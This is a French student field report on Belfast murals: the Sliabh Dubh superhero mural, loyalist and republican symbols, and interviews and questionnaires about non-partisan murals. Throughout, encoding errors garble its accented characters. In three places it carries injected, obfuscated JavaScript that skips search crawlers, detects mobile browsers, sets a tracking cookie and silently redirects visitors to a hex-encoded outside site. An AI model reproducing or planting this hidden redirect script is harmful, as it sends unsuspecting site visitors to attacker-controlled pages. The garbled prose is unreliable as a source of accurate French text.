os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Analyse des donnA�es rA�coltA�es sur le terrain – SolidaritA� internationale

Analyse des donnA�es rA�coltA�es sur le terrain

Notre analyse se basera sur une A�tude comparative des donnA�es rA�coltA�es lors de notre sA�jour. Elle reposera sur 3 A�lA�ments que nous avons observA�s A� la fois chez les loyalistes et les rA�publicainsA�:

  • Murals de soutien A� da��autres conflits
  • PrA�sence visuelle de soutien dans la��espace public (rA�sidentiel)
  • PrA�sence visuelle de soutien dans la��espace public (magasins, ainsi que leurs inventaires et la��origine des produits faisant rA�fA�rence A� da��autres causes).

Enfin, une cartographie de ces A�lA�ments viendra apporter une reprA�sentation visuelle de la rA�partition de ces divers symboles A� travers la ville de Belfast. Nous espA�rons avec cette analyse pouvoir rA�ussir A� dA�terminer quelles sont les potentielles diffA�rences entre les deux parties, et proposer des hypothA?ses cherchant A� expliquer ces A�ventuelles diffA�rences dans la��espace urbain. Notre analyse sera appuyA�e par diverses photos ainsi que par des prA�cisions quant A� la gA�olocalisation des divers A�lA�ments.

Afin d’assurer une vision claire des A�lA�ments d’analyse, nous les rA�partirons dans les deux classes suivantes : Loyalistes et rA�publicains.

ElA�ments loyalistes
ElA�ments rA�publicains

Il est A�galement intA�ressant de noter que, lors de nos observations dans des quartiers mixtes du centre-ville, il y a une absence totale de symbole autant da��un cA?tA� que de la��autre.

Cartographie

Pour voir la carte en pleine A�cran, cliquer ici.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Annexe

Questionnaire & Guide d’entretien

 

Questions pour les passants:

    1. AStes-vous du quartier ou de passage? Are you from the neighborhood or are you just passing by?
    2. Que pensez-vous de ce mural? What do you think about this mural?
    3. Est-ce que vous A?tes au courant des raisons pour lesquelles cette fresque A� A�tA� peinte? Do you know the reason of its painting?
    4. Pensez-vous que la rA�alisation de ce mural A�tait une bonne idA�e? Do you think the realisation of this painting was a good idea?
    5. Vous souvenez-vous de ce qui y figurait avant les super-hA�ros? Que pensez-vous du changement? Do you remember what was here before the superheroes? What do you think of the change?
    6. Pensez-vous que la peinture de ce mural a renforcA� la cohA�sion du quartier? Do you think that the painting of this mural reinforced social cohesion in the quarter?

Guide da��entretien pour la��interview de Steven Corr:

  1. Avez-vous une idA�e de la raison pour laquelle le mur des super-hA�ros a A�tA� peint? Do you have an idea of why the superhero wall was painted?
  2. Pourquoi pensez-vous que cet emplacement a A�tA� choisi? Why do you think this spot was chosen?
  3. Savez-vous comment ont rA�agi les gens aprA?s la crA�ation de ce mural? Do you know how the people reacted after the creation of this mural?
  4. Pensez-vous que le mural a le mA?me effet aujourda��hui sur la communautA� de Sliabh Dubh que lors de son inauguration? Do you think that the mural still has the same effect on Sliabh Dubha��s population as when it was inaugurated?
  5. A votre connaissance, y a-t-il da��autres projets de ce genre en cours? Do you know if there are other projects of the same type in course?
  6. A quel point sa��est impliquA� la mairie dans le projet de crA�ation de ce mural? How was the City Hall involved in the creation of this mural?
  7. Y a-t-il une dimension touristique au mural des super-hA�ros? Est-ce un de ses buts? Is there a touristic dimension to the superheroes wall? Is that one of its purposes?
  8. Avez-vous une idA�e de comment gA�rer les images du conflit sans raviver la haine qui y est liA�e? Do you have an idea of how to handle conflict-related images without reviving the hatred?

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

DonnA�es et Analyse

Nous allons prA�senter nos donnA�es par thA�matiques, regroupant ainsi des informations obtenues de diffA�rentes sources pour en faire le lien et les analyser en faisant ressortir des tendances.

1) Projet du mural:

[Informations rA�coltA�es avant le voyage] Le projet du mural des super-hA�ros date de 2013 et a A�tA� rA�alisA� par Danny Devenney, peintre rA�publicain spA�cialisA� en murals, avant quoi le mur abritait des graffitis. Le design de cette faA�ade a A�tA� imaginA� par les jeunes de la communautA� du quartier, et sa rA�alisation a A�tA� possible grA?ce au support de plusieurs organisations: the Housing Executive Sliabh Dubh Residents Association, the Fold Housing Association, the Black Mountain Shared Spaces Project et the Upper Springfield Development Forum1. Ces diffA�rentes associations de quartier ont toutes pour objectif une bonne cohA�sion sociale des habitants. Le programme du Building Relationships in Communities, appelA� BRIC, est celui qui a commandA� la rA�alisation de cette peinture, avec le but da��embellir les relations entre les habitants de la rA�gion, A�tant donnA� que le but premier de ce programme est celui de la��amA�lioration de relations entre diffA�rentes communautA�s de la��Irlande du Nord.
[DonnA�es da��entretien] La��aboutissement du projet du mural sur les super-hA�ros a rencontrA� quelques soucis. En effet, les opposants au mural soulignaient le fait que peindre une telle fresque tuerait la��histoire et que des reprA�sentations du conflit seraient plus A�ducatrices et bA�nA�fiques pour les enfants.

[Questionnaire aux passants] Ce mural A�tait destinA� aux enfants du quartier.

Analyse: Nous avons pu rA�colter les informations de factuelles en amont. Nous nous sommes aperA�u que, contrairement A� ce que la��on pensait a priori, les passant ne savait pas grand chose du mural des super-hA�ros. Du moins ca��est le cas des quatre personnes que nous avons eu la��occasion d’interroger. Sa��ils ne le savent pas pertinemment, les passants interrogA�s ont cependant la��air da��avoir compris que le mural des super-hA�ros est effectivement destinA� aux enfants. Pour ce qui est des donnA�es rA�coltA�es lors de la��entretiens avec le conseiller Steven Corr, nous sommes dans la��obligation de le croire sur parole faute da��avoir une confirmation de ses propos par un potentiel contestataire du projet.

2) Mural des super-hA�ros:

[Observations]

– AtmosphA?re: Les seuls points A� relever sont la permanence du bruit des voitures passant sur la route principale, se situant juste A� cA?tA� du mur, ainsi que les bavardages en provenance de la��A�cole du quartier.

Analyse: La��atmosphA?re relevA�e semble en accord avec les objectifs premiers de la rA�alisation du mural, A�tant donnA� la proximitA� da��une A�cole, qui garantit donc le passage da��enfants devant la fresque.

– Mesures: longueur da��environ 11m19.

Analyse: Ce mural est relativement long, par rapport A� da��autres fresques que nous avons eu la��occasion da��observer A� Belfast. Nous pouvons donc imaginer que ses dimensions augmentent son impact dans la��espace public.

– Situation du mural:

[Observation] Nous avons repA�rA� une fresque commA�morant les A�vA?nements du a�?Bloody Sundaya�? de 1972 A� quelques mA?tres derriA?re notre mural.
Nous avons A�galement dA�couvert, de la��autre cA?tA� de la rue et perpendiculairement A� notre mural, une fresque reprA�sentant des princesses Disney.
[Questionnaire aux passants] Le mural a A�tA� peint A� cet emplacement, car le quartier de Sliabh Dubh existe depuis une dizaine da��annA�es et est donc relativement rA�cent, et car la��A�cole primaire John Paul II se trouve aux alentours.
[DonnA�es da��entretien] Sliabh Dubh signifie a�?Black Mountaina�? en gaA�lique, en rA�fA�rence A� la colline se trouvant A� la��ouest du quartier. Avant de rA�cemment A?tre transformA�e en zone rA�sidentielle, une fabrique se situait lA� oA? se dresse aujourda��hui le quartier.

Analyse:
– Le mot a�?massacrea�? en lettres capitales est visible de loin depuis la route ainsi que depuis le quartier rA�sidentiel. Pour ces raisons, la mise en place du mural des super-hA�ros sur les murs de la��entrA�e dans Sliabh Dubh A� un impact da��autant plus fort, car la prA�sence de ces personnages mythiques pour les enfants apporte de la couleur au paysage, contrastant avec la prA�sence nA�gative et sombre du mot a�?massacrea�? non loin de lA�.
– Nous observons que la notion de la��A�cole primaire revient, ce qui signifie que notre supposition lors de la��observation de la��atmosphA?re du mural est vA�rifiA�e par la��un des habitants du voisinage.
– Le mural de princesses augmente considA�rablement la contribution de la reprA�sentation non-partisane dans la��espace public, de part ses aussi grandes dimensions que celui des super-hA�ros.

– a�?LA�gendea�? du mural: Une plaque figure dans le coin de la fresque, en haut A� gauche, stipulant: a�?Supported by bric programme through European Peace III programmea�?, et comportant A�galement les logos de chaque entitA� ayant participA� au projet de rA�alisation du mural.

Analyse: Le nom complet du programme est a�?EU Programme for Peace and Reconciliation in Northern Ireland and the Border Region of Irelanda�?, ce qui le rend pertinent avec notre sujet. De plus, il a A�tA� mis en action de 2007 A� 2013, sa fin coA?ncidant parfaitement avec la planification et rA�alisation du mural des super-hA�ros. Le but de ce programme A�tait de renforcer le progrA?s vers la paix et vers une sociA�tA� stable et de promouvoir la rA�conciliation entre les communautA�s da��Irlande du Nord. Le programme visait A� amA�liorer les relations communautaires au niveau local, tout en rendant compte du passA�, et crA�er des espaces publics ouverts et partagA�s. La spA�cificitA� de ce projet est le fait que son financement fut en partie opA�rA� par des association communautaires et des partis volontaires, qui A�taient ensuite libres de contacter la��autoritA� responsable de leur rA�gion pour mettre vie A� diffA�rents projets.
Le mural des super-hA�ros a donc A�tA� rA�alisA� A� des buts dA�passant le simple objectif de rendre heureux les enfants, comme ce que nous verrons plus loin, pensent les passants rencontrA�s.

3) La��impact du mural:

[DonnA�es da��entretien] Ce projet a la��avantage da��avoir permis aux jeunes de la communautA� de sa��exprimer da��une maniA?re semblable A� celle des peintres adultes.
[Questionnaire aux passants] Un de nos interrogA�s, un habitant du quartier, nous tA�moigna son ressenti da��une meilleure cohA�sion sociale depuis la prA�sence des deux murals dA�diA�s aux enfants dans le paysage. Il souligna A�galement que ce mur anciennement vierge na��A�tait pas respectA� par les enfants, qui jetaient leurs ballons dessus, na��y portant aucun intA�rA?t; fait complA?tement absent A� prA�sent que ce mur en question est recouvert de leurs idoles. Il nous fit part de son opinion sur le mural: grandir autour de fresques telles celle des super-hA�ros est bA�nA�fique pour les enfants, et la crA�ation de nouveaux murals semblables est, selon lui, un trA?s bon moyen de construire un meilleur avenir pour les futures gA�nA�rations.
Un autre de nos interviewA�s A�tait un homme du troisiA?me A?ge, accompagnA� de son petit fils. Ils na��habitaient pas le quartier, mais au Sud de Belfast, et se trouvaient lA�, A� prendre des photos, car ils avaient dA�couvert la��existence de ce mural dans un livre et que la��enfant exprima la��envie da��avoir des photos de soi-mA?me accompagnA� de ses hA�ros favoris.
Les impressions A�tant le plus ressorties sont le fait que le mur des super-hA�ros est trA?s apprA�ciA�.

Analyse: Avec un but de faire ressortir le ressenti gA�nA�ral des habitants sur la fresque et les effets de sa rA�alisation sur la communautA�, nous nous sommes basA�es sur une analyse comparative des rA�sultats du questionnaire, nous concentrant sur les points communs des rA�ponses de sorte A� en ressortir une tendance. Bien que nos rA�sultats ne peuvent A?tre gA�nA�ralisA�s, A�tant donnA� que notre A�chantillon na��est pas reprA�sentatif de la population, ils nous permettent tout de mA?me da��avoir une vague idA�e de la��impact social du mural A�tudiA�.

La��information A�tant le plus ressortie est le bA�nA�fice du mur des super-hA�ros pour les enfants du quartier; et nous pouvons affirmer qua��au travers du fait que des habitants de Belfast se dA�placent pour le voir, il est trA?s apprA�ciA� par les jeunes gA�nA�rations et constitue une attraction qui les attire.
Le respect de jeunes envers le mur pourrait A?tre considA�rA� comme le rA�sultat da��un impact A�ducatif de ce mural.

4) RA�gion de Ballymurphy:

[Entretien] Il existe un projet en cours visant A� relancer la��A�conomie du quartier par la construction da��un nouvel hA?tel destinA� aux touristes A� cA?tA� du cimetiA?re de Ballymurphy, de sorte A� crA�er des emplois pour les habitants des environs.
La zone de Ballymurphy observe dA�jA� depuis un bon moment des problA?mes de drogue et de suicide. Actuellement, deux projets de murals sont en cours et ont comme thA?me le suicide et comme objectif sa prA�vention. A�Children can spell better the word suicide than the word happinessA�, qui veut dire a�?Les enfants savent mieux A�peler le mot suicide que le mot bonheura�?.
Lors du tour de la rA�gion avec le conseiller, nous avons dA�couvert un mural relativement long sur Beechmount Avenue. Celui-ci est recouvert de portraits de victimes catholiques assassinA�es durant le conflit. Juste en face se trouve un mA�morial aux morts ayant pris directement part au conflit et A�tant pour la plupart membres de la��IRA. Steven Corr nous prA�cisa qua��un tel mural a une forte influence psychologique sur les enfants passant devant tous les jours sur leur trajet scolaire. Ce phA�nomA?ne avait A�tA� sa principale motivation pour soutenir le projet da��un mur non-partisan, dont le contenu serait choisi par les enfants et donc beaucoup plus joyeux et positif pour leur moral qua��un nouveau mural traitant du conflit de Belfast. Il a aussi A�tA� inspirA� par la citation de Bobby Sands prA�sente sur le trottoir da��en face du mural a�?MURDEREDa�?. Celle-ci dit: A�Our revenge will be the lauther of our childrenA�, qui en franA�ais veut dire a�?notre vengeance sera le rire de nos enfantsa�?.

Analyse: La��inquiA�tude des habitants de Belfast pour les futures gA�nA�rations tend A� beaucoup ressortir lors de discussions avec eux. En effet, nous pouvons nous poser la question de la��impact du conflit sur les enfants et des mesures prises pour le minimiser. Notre hypothA?se initiale, comme quoi la��art non-partisan serait un moyen da��attA�nuer la��hA�ritage nA�gatif du conflit, est corroborA�e par le discours du conseiller. Cela dit, ce postulat ne peut A?tre A�tendu A� da��autres personnes, A�tant donnA� l’absence de donnA�es supplA�mentaires A� ce sujet.
Le mot a�?MURDEREDa�? A�crit en rouge et en gras parsA?me le mural de Beechmount Avenue, A�tant A�crit sous chacune des photos et sautant directement aux yeux, scandalisant les A�vA?nements auxquels le mural rA�fA?re. Nous observons un phA�nomA?ne de glorification des hA�ros de guerre et de dA�nigrement des loyalistes, considA�rA�s ici comme des meurtriers de masse. La rue sur laquelle se situe ce mural a, de part le mA�morial se situant en face et la mise en avant des A�vA�nements macabres, un aspect de cimetiA?re et de lieu de mA�moire tragique.

5) ThA�matique du non-partisan:

[Questionnaire aux passants] Selon la��un de nos interrogA�s, les murals de Belfast traitant du conflit sont trA?s A�ducatifs et ne devraient en aucun cas A?tre retirA�s.

[DonnA�es da��entretien] La destruction da��un mural tel que celui des portraits a�?MURDEREDa�? aurait un impact chaotique auprA?s de la communautA�, car les visages sur ce mur sont familiers et appartiennent A� des personnes que les habitants ont rA�ellement connu. Le fait de garder ce genre de reprA�sentation macabre serait donc un moyen de perpA�tuer la gloire de ces victimes et da��A�vier des effusions de violence, ainsi qua��un outrage gA�nA�ral.
Le point fort da��un mural tel que celui des super-hA�ros serait, pour le conseiller, le fait qua��il apporte de la joie et de la��espoir aux nouvelles gA�nA�rations; en contraste avec les reprA�sentations dA�nonA�ant les loyalistes comme les coupables absolus de la mort da��un grand nombre de victimes.
Nous avons A�galement appris lors de cet entretien que chaque rA�gion sa��occupe des murals qui sont dans ses dA�limitations. Les fresques peintes sur les murs sont soit financA�es par le ministA?re, soit par des associations ou des groupes da��art. La mairie na��est aucunement inclue dans aucun projet de mural et aucune demande na��a besoin de lui A?tre formulA�e pour la crA�ation de nouvelles fresques.
Steven Corr nous a appris que les murals non partisans constituent 10% de ceux de Belfast et se situent dans des quartiers pA�riphA�riques, comme Sliabh Dubh. Cette politique de crA�ation de murals na��ayant aucun rapport direct avec le conflit entre les rA�publicains et les loyalistes consiste A� mettre en avant la culture et le sports. Il nous a expliquA�es qua��il ne sa��agit pas d’effacer la��histoire, mais de mettre en valeur da��autres aspects de Belfast dont les citoyens peuvent A?tre fiers et qui ne suscitent pas une A�motion qui engendrerait des actes de violence. La localisation des muraux non partisans est choisie principalement au hasard, selon les lieux oA? il y a de la place.
Lors du tour, nous avons A�galement A�tA� amenA�es devant une fresque non partisanne, sur Beechview Park, nommA�e Olympic medal winner, reprA�sentant le Titanic et les jeux olympiques. Steven Corr nous apprend que la peinture de cette fresque a coA�tA� six milles livres sterling; fait dA�concertant lorsque la��on observe son A�tat da��aujourda��hui. Le mural A� A�tA� vandalisA� et des graffitis le recouvrent A� de multiples endroits.

Analyse: Nous pouvons faire un lien avec ce qui a A�tA� dit lors de la confA�rence de Naomi Doak et de Robert Heslip sur la politique touristique mise en place par la municipalitA� de Belfast, les questions d’hA�ritage du conflit et le dark tourism (voir article ConfA�rence sur le tourisme: Quel avenir pour Belfast?); le problA?me qui rA�side avec les murals non-partisans est qua��ils sont contradictoires avec la promotion du dark tourism de la ville de Belfast, car ils effacent le passA� conflictuel pour lequel les touristes viennent visiter les lieux. En revanche, ce nouveau type de murals est en accord avec la promotion du a�?phoenix tourisma�? que la municipalitA� essaye de mettre en avant, dans le but de montrer un aspect plus positif de la ville.
Nous observons une tendance des habitants A� penser que les murals traitant du conflit sont A�ducatifs et mA�ritent leur place dans la vie des nouvelles gA�nA�rations grandissantes, A�tant donnA� qua��ils rendent compte de la��histoire de leur patrie.
De plus, nous observons chez le dirigeant de la rA�gion de Ballymurphy une volontA� de mettre en avant des aspects de la ville autres que ceux du conflit, auxquels chaque habitant pourrait sa��identifier sans ressentir de la haine.

Pour ce qui est du mural Olympic medal winner, nous avons eu la confirmation qua��il a A�tA� peint pour la paix et illustrer da��autres symboles de fiertA� auxquelles les belfastois peuvent sa��identifier. Il entre donc bel et bien dans le registre des murals non-partisans pour une meilleur cohA�sion sociale2.


6) Politique du conseiller:

[DonnA�es da��entretien] Steven Corr essaye da��appuyer les projets de peinture de tous types de murals, principalement dans la��optique de lA�guer un patrimoine plus joyeux aux nouvelles gA�nA�rations tout en perpA�tuant la mA�moire des conflits de Belfast. Il nous a informA�es qua��il organise chaque A�tA�, en aoA�t, un festival A� Belfast pour les enfants: A�kids partyA�, oA? figurent barbecues et jeux. Le but de ce festival serait da��apporter une meilleure cohA�sion dans le quartier, ce qui nous amA?ne A� la tactique du conseiller pour dA�passer le conflit: faire en sorte que les enfants ne se sentent plus concernA�s par celui-ci.
Il faudrait, da��aprA?s lui, essayer de concilier les projets historiques avec les culturels, car les rA�gions oA? se trouvent les murals sont principalement des rA�gions de dA�pression sociale.

